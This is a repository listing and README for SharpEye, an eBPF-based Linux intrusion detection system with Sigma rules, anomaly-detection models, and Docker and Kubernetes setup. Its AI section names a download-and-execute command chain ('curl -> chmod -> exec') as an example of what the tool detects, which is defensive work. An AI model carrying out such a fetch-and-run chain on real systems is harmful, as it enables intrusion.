https://github.com/sginnora/sharpeye
SharpEye: Advanced Linux Intrusion Detection and Threat Hunting System
https://github.com/sginnora/sharpeye
anomaly-detection cloud-native cryptominer-detection cybersecurity ebpf golang ids intrusion-detection kubernetes linux machine-learning monitoring python rootkit-detection security sigma-rules threat-hunting
Last synced: 4 months ago
JSON representation
SharpEye: Advanced Linux Intrusion Detection and Threat Hunting System
- Host: GitHub
- URL: https://github.com/sginnora/sharpeye
- Owner: sgInnora
- License: mit
- Created: 2025-05-08T01:25:22.000Z (about 1 year ago)
- Default Branch: main
- Last Pushed: 2026-01-18T01:40:43.000Z (5 months ago)
- Last Synced: 2026-01-18T13:49:37.802Z (5 months ago)
- Topics: anomaly-detection, cloud-native, cryptominer-detection, cybersecurity, ebpf, golang, ids, intrusion-detection, kubernetes, linux, machine-learning, monitoring, python, rootkit-detection, security, sigma-rules, threat-hunting
- Language: Python
- Size: 847 KB
- Stars: 169
- Watchers: 3
- Forks: 6
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- Changelog: CHANGELOG.md
- Contributing: CONTRIBUTING.md
- License: LICENSE
- Audit: AUDIT_REPORT.md
- Security: SECURITY.md
Awesome Lists containing this project
README
# SharpEye: Gen 4 Cloud-Native IDS
[](https://github.com/innora-ai/sharpeye)
[](https://www.python.org/)
[](https://go.dev/)
[](LICENSE)
[English](README.md) | [δΈζ](README_zh.md)
**SharpEye** is an advanced Linux Intrusion Detection System (IDS) engineered for modern cloud-native environments. It represents a paradigm shift from polling-based monitoring to real-time kernel telemetry using **eBPF (CO-RE)**, augmented by a **Hybrid AI Brain**.
## π Key Features
- **π§ Hybrid Brain Architecture**:
- **Rule Engine**: Deterministic detection using Sigma-compatible YAML rules.
- **Anomaly AI**: Unsupervised Isolation Forest for detecting statistical outliers.
- **Sequence AI**: Hidden Markov Models (HMM) for detecting malicious command chains.
- **ποΈ eBPF Vision**:
- High-performance kernel telemetry using `sys_enter_execve` tracepoints.
- Implemented as a lightweight **Go Sidecar** (Probe) for minimal overhead.
- **πΈοΈ Distributed Orchestration**:
- Kubernetes DaemonSet ready.
- Heartbeat and Alert reporting via REST API.
- Centralized Threat Intelligence integration.
- **β‘ High Performance**:
- Capable of processing 600k+ EPS on a single core (Rule Engine).
- Adaptive sampling for AI modules in high-load scenarios.
## π‘ Why SharpEye?
| Feature | Traditional IDS (Snort/Suricata) | Legacy HIDS (OSSEC/Wazuh) | **SharpEye (Gen 4)** |
| :--- | :--- | :--- | :--- |
| **Visibility** | Network Packets | Log Files / Syscalls (Auditd) | **Kernel Tracepoints (eBPF)** |
| **Performance** | High (Deep Packet Inspection) | Medium (Auditd Overhead) | **Extreme (Zero-Copy)** |
| **Detection** | Signatures Only | Rules + File Integrity | **Hybrid (Sigma Rules + AI)** |
| **Unknown Threats**| β Misses 0-days | β Misses logic bugs | β
**Detects Anomalies** |
| **Deployment** | Network Tap | Heavy Agent | **Lightweight Sidecar** |
## ποΈ Architecture
SharpEye follows a decoupled **Brain-Eye** architecture:
- **The Eye (Probe)**: A Go binary running eBPF programs. It captures kernel events and forwards them to user space via Perf Buffers.
- **The Brain (Engine)**: A Python process that ingests the event stream, applies detection logic, and manages state (sessions, network connections).
See [ARCHITECTURE.md](docs/ARCHITECTURE.md) for deep dive.
## π¦ Installation
### Prerequisites
- Linux Kernel 5.8+ (BTF enabled recommended)
- Docker / Kubernetes
### Quick Start (Docker)
```bash
# Build the container (Multi-stage build)
docker build -t sharpeye:latest -f Dockerfile.k8s .
# Run in privileged mode (Required for eBPF)
docker run --privileged \
-v /sys/kernel/debug:/sys/kernel/debug \
-v /lib/modules:/lib/modules:ro \
sharpeye:latest
```
### Kubernetes Deployment
```bash
kubectl apply -f k8s/daemonset.yaml
```
## π§ AI Capabilities
SharpEye features a self-learning mechanism:
1. **Cold Start**: Automatically collects the first 1000 process events to train a baseline model.
2. **Online Learning**: Retrains models every 1000 events to adapt to drift.
3. **Sequence Analysis**: Tracks `PPID` sessions to detect anomalous command chains (e.g., `curl` -> `chmod` -> `exec`).
## π€ Contributing
We welcome contributions! Please see [CONTRIBUTING.md](CONTRIBUTING.md) for details on setting up the dev environment.
## π License
MIT License. See [LICENSE](LICENSE) for details.